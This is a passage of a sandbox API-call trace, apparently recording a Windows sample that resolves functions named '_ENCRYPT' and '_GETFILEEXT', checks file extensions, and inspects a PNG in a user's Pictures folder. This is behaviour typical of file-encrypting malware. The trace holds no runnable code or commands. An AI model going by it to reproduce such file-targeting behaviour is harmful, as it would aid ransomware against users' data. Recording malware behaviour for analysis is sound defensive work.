(HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0190.926] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0190.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0190.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0190.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0190.927] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0190.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0190.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0190.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.928] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9e38 [0190.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9e38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0190.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.928] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0190.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0190.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0190.928] CloseHandle (hObject=0x158) returned 1 [0190.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0190.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0190.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.931] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0190.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0190.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.932] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0190.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0190.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.932] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.932] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0190.932] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.932] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0190.932] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0190.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.932] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.932] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.932] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.932] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ac7960, ftCreationTime.dwHighDateTime=0x1d5e3d1, ftLastAccessTime.dwLowDateTime=0x6fbebf20, ftLastAccessTime.dwHighDateTime=0x1d5dac2, ftLastWriteTime.dwLowDateTime=0x6fbebf20, ftLastWriteTime.dwHighDateTime=0x1d5dac2, nFileSizeHigh=0x0, nFileSizeLow=0x3ead, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ufXfgc_LQhg.png", cAlternateFileName="UFXFGC~1.PNG")) returned 0x90add8 [0190.933] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.933] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.933] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ac7960, ftCreationTime.dwHighDateTime=0x1d5e3d1, ftLastAccessTime.dwLowDateTime=0x6fbebf20, ftLastAccessTime.dwHighDateTime=0x1d5dac2, ftLastWriteTime.dwLowDateTime=0x6fbebf20, ftLastWriteTime.dwHighDateTime=0x1d5dac2, nFileSizeHigh=0x0, nFileSizeLow=0x3ead, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ufXfgc_LQhg.png", cAlternateFileName="UFXFGC~1.PNG")) returned 0x90add8 [0190.933] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.933] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ufXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fXfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xfgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gc_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.935] CompareStringW (Locale=0x400, 